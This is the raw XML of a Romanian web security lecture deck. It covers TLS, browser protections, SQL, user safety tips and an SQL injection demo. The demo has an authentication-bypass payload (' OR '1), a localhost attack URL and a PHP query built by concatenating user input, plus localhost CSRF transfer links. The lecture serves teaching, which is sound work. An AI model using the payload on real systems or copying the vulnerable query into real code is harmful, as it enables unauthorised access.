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Old Standard TT"/>
      <p:regular r:id="rId49"/>
      <p:bold r:id="rId50"/>
      <p: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ldStandardTT-italic.fntdata"/><Relationship Id="rId5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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6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2f0256e6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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6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2f0256e6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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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2f0256e6f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example.com/show.php?bugid=1234" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/show.php?bugid=1234" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/show.php?bugid=1234" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/show.php?bugid=123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localhost/security/csrf/doTransfer.php?destinatar=spiderman&amp;suma=5%22/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/security/csrf/doTransfer.php?destinatar=spiderman&amp;suma=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localhost/security/csrf/doTransfer.php?destinatar=spiderman&amp;suma=5&amp;token=09e8411f66114d22bd18b5fcebed2c05"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owasp.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://beefprojec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google.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ww.example.com/index.php?var=val#id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Securitate Web</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Adrian Sterca (forest@cs.ubbcluj.ro) • 15.07.2021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vs. HTTPS. TLS (Transport Layer Security)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Google Shape;113;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TLS este un sistem de autentificare bazat pe chei publice care permite browserului sa certifice identitatea unui server web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP + TLS = HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Un server web isi certifica identitatea printr-un certificat X.509 care contine cheia sa publica si identitatea sa (nume, domeniu DNS, adresa)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certificatul X.509 al unui server web este fie self-signed sau semnat digital cu cheia privata a unei Certification Authority (CA) - cheile publice si private sunt pe minim 2048 biti (au aprox. peste 256*3 cifre zecimale)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Se creeaza lanturi de certificate plecand de la o autoritate radacina care semneaza certificatul altei autoritati intermediare care semneaza certificatul altei autoritati etc. - asa se elimina problema </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>man-in-the-middle</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Detalii autentificare server web folosind TLS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1058225"/>
            <a:ext cx="8659200" cy="3857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Browserul downloadeaza certificatul X.509 al serverului web care contine identitatea serverului web si cheia sa publica; acest certificat este semnat cu cheia privata a unei Trusted Certification Authority (CA)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browserul cand se instaleaza contine si o lista de trusted Certification Authorities (CA). Browserul va folosi cheia publica a Trusted CA care a semnat certificatul X.509 al serverului web pentru a valida (decripta) certificatul serverului web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certificatul X.509 contine numele DNS si adresa IP a serverului web. Browserul verifica faptul ca acestea sunt cele la care browserul s-a conectat</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browserul genereaza o cheie simetrica (partajata) cu care va cripta traficul spre serverul web. Browserul cripteaza cheia simetrica cu cheia publica a serverului web si o trimite serverului web, astfel ca doar serverul web o va putea decripta cu cheia lui privata</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mai departe, traficul intre browser si server web se cripteaza cu aceasta cheie simetrica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Mecanisme de securitate ale browserului</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;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Javascript sandbox (codul javascript nu poate creea sau accesa fisiere externe browserului; nici procese externe browserului si nici alte resurse)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>same-origin policy (o resursa nu poate fi accesata prin javascript de pe alt server decat cel curent)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>un tab/fereastra a browserului nu poate accesa alt tab/fereastra a browserului (prin intermediul Javascript)</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Comunicare web - aplicatii web server-side</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Google Shape;131;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1210625"/>
            <a:ext cx="8839200" cy="2419350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909975" y="3317100"/>
            <a:ext cx="13500" cy="4566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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7426500" y="3881125"/>
            <a:ext cx="1101225" cy="10340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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016425" y="4198063"/>
            <a:ext cx="119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Baza de date</a:t>
            </a:r>
            <a:endParaRPr>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SQL - Structured Query Language</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Google Shape;140;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="80575" y="1171600"/>
            <a:ext cx="89709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SQL este un limbaj standard, programatic, pentru interogare/operare cu Baze de date</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Contine, 4 operatii principale: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Select, Insert, Update, Delete</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exemple:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="57150" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> nume, prenume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Utilizatori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> email=’adrian.sterca@ubbcluj. ro’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="57150" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Utilizatori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(‘Adrian’, ‘Sterca’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>’adrian.sterca@ubbcluj. ro’)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="57150" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DELETE FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Utilizatori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> email=’adrian.sterca@ubbcluj. ro’</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="57150" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Utilizatori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> nume=’Sterca’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> email=’adrian.sterca@ubbcluj. ro’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Securitate web - perspectiva utilizatorului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512700" y="174275"/>
            <a:ext cx="8297100" cy="3531900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>totdeauna logout de pe un site pe care nu-l mai folosesti (previne CSRF, session hijacking)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>foloseste parole de complexitate mare (minim 8/12 caractere, minim o litera mare si un caracter special) sau si mai bine 2-factor authentication (parola + PIN receptionat pe telefon)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>nu transmite date senzitive (parole, username, date bancare) peste HTTP (totdeauna sa fie HTTPS)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>nu amana un browser update (vezi vulnerabilitatea Heartbleed pentru TLS/ HTTPS)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>nu downloada orice fisier (mai ales fisiere executabile)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>nu da click pe orice link sau daca totusi dai, e bine sa nu ai multe sesiuni de browser deschise</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t>Securitate web - perspectiva hacker-ului si a programatorului de aplicatii web</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Sql Injection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 este Sql injection ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;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Presupune ca aplicatii web vulnerabile construiesc interogari SQL cu ajutorul datelor primite direct de la utilizator (fara filtrare/prelucrare prealabila a datelor)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Parametrii construiti special de utilizator (i.e. hacker) pot fi folositi de catre server in instructiuni SQL si pot determina descoperirea unor date sensibile, stergerea/modificarea unor date sensibile </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Efectele Sql-injection pot fi devastatoare asupra BD-ului aplicatiei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Agenda</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;66;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979800" y="1704550"/>
            <a:ext cx="3837000" cy="20088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Cunostinte premergatoare</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Securitate web - perspectiva utilizatorului</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Securitate web - perspectiva hackerului</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Securitate web - perspectiva programatorului de aplicatii web</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Bobby drop tables :)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="172" name="Google Shape;172;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="636350" y="1559800"/>
            <a:ext cx="8195949" cy="2522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Exemplu Sql injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3021650"/>
            <a:ext cx="8520600" cy="154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Introducem User: forest</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Introducem Password=wrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' OR '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="179" name="Google Shape;179;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986000" y="1286063"/>
            <a:ext cx="2876550" cy="1104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Exemplu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sql injection (partea a 2-a)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1171600"/>
            <a:ext cx="8520600" cy="37437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Dupa ce utilizatorul apasa butonul ‘Login’, URL-ul urmator va fi incarcat de browser:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://localhost/~forest/security/sql-injection/example-1/authenticate.php?user=forest&amp;pass=wrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' OR '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Presupunem ca serverul e scris in PHP si va executa urmatoarea instructiune SQL:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SELECT * FROM users where user='" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> . "' and password='" .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. "'"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
